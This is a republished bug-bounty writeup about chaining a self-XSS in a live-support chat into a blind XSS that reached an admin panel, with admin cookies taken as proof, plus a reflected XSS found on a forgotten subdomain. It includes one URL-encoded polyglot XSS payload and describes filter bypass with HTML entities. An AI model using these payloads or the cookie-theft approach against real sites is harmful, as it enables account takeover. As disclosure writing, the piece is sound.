Self XSS leads to blind XSS and Reflected XSS

medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 20 hours ago · bug-bounty
quality 5/10 · average
0 net
AI Summary

A bug bounty hunter demonstrates chaining self-XSS to blind XSS in an admin panel via HTML entity encoding bypass, then discovers a reflected XSS on an undiscovered subdomain using KNOXSS payload analysis, earning $700 total. The writeup focuses on practical payload techniques and methodology rather than detailed technical analysis.

Tags
xss blind-xss reflected-xss self-xss html-entities payload-crafting waf-bypass cookie-theft admin-panel bug-bounty bragging-post
Entities
KNOXSS Sublist3r Skeletorkeys Friendly
Self XSS leads to blind XSS and reflected XSS. | by Friendly - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original Self XSS leads to blind XSS and reflected XSS. In regards to this tweet: https://twitter.com/Skeletorkeys/status/1026497897871884289 Friendly Follow ~3 min read · August 6, 2018 (Updated: August 10, 2018) · Free: Yes Important Note: This website does not want me to disclose their website name,until they have setup their Bounty Program, which I will disclose in the future if they allow me to — or they will likely do it themselves from my interpretation on what they said. However in this post, I will explain to my best knowledge on how KNOXSS plays a role here, how I got a blind XSS through a self XSS and a reflected XSS. If you message me on Twitter for help, then I will try my best to assist you! But regarding this website will be a straight NO. My reason is simple for that: I do not want to break their privacy nor lose my contact with them, or any other future bounties this website has to offer me. I don't expect this to work for everyone, or some of you since each websites WAF security is different than-one-and-another — and how it works. Now to the fun part: To XSS yourself on this website was the most trickiest part and difficult part. When I tried to input the following tags : ", ', ><, / and \ — I saw that they were being filtered in their live support chat and wasn't being rendered in at all. After spending 20 - 30 mins, I tried some HTML entities and I saw my outputs being rendered in regular tags, so I decided to cook up an image tag XSS. That being said, I used the following HTML entities: "> and my output became "> which then gave me this: OUR MAGICAL CONFIRMATION "1" :D Then their live support team member messaged me saying: "Hey did you send a popup box with a message saying "1", and I responded with "Yes I did." That moment I knew I had a blind XSS which reflects back into their Admin Panel. So I quickly cooked up another payload to grab their cookies — the big boys cookies. That moment I knew I had access to their Administrators and Devs account. I swiftly contacted them and their Administrators again and I was asked me if I could login as them and give a proof of concept — which I did. Logged in and changed their names to my name for a bit more proof of concept. They were shocked. They asked me for my PayPal to send me a lil something, something. ;) I was awarded $500 for this with the reason "Security Guy." Ha. However, I didn't stop there. Next part is using KNOXSS and Sublist3r — I used Sublist3r which helped me locate and able to find all their subdomains. I found one of their subdomain http://search.websitename.com which wasn't listed on their website at all and it wasn't secured at all. Just had a search box, a bunch of outdated information. First I tried "> and I got no alert. Which was a bummer. I tried every single possible payload I could think of and got no result. So I went to KNOXSS and posted my POST DATA and saw something interesting which was %3E%3CScrip%3E being rendered in the URL as > . So I did a quick Google and found a payload that was similar to something I was using, and that payload was: 1%3C!%27/*%22/*\%27/*\%22/* — %3E%3C/Script%3E%3CImage%20Srcset=K%20*/;%20Onerror=confirm1%20//%3E# I input that in my URL with my POST DATA and got my little confirmation 1. I quickly contacted their Administrators and Devs and explained how dangerous this can be and how bad it could be. They agreed with me and quickly took down that subdomain. I was then rewarded $200 for a reflected XSS and with a little reason: "Try to reflect this back." They have a great sense of humor. Ha. Total bounty for the day: $700 USD If you have any questions or comments, feel free to message me on Twitter, or tweeting me @Skeletorkeys Thank you for reading and I hope this is informative enough and I do apologize for not sharing that domain with you all. Again, this isn't my choice it's the websites choice and I respect that and I hope you guys do as well. I probably used some terms wrong too. Heh. Anyways, thanks for reading. #security #xs #blind-xss #xss-attack #reflected Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
← Back to stories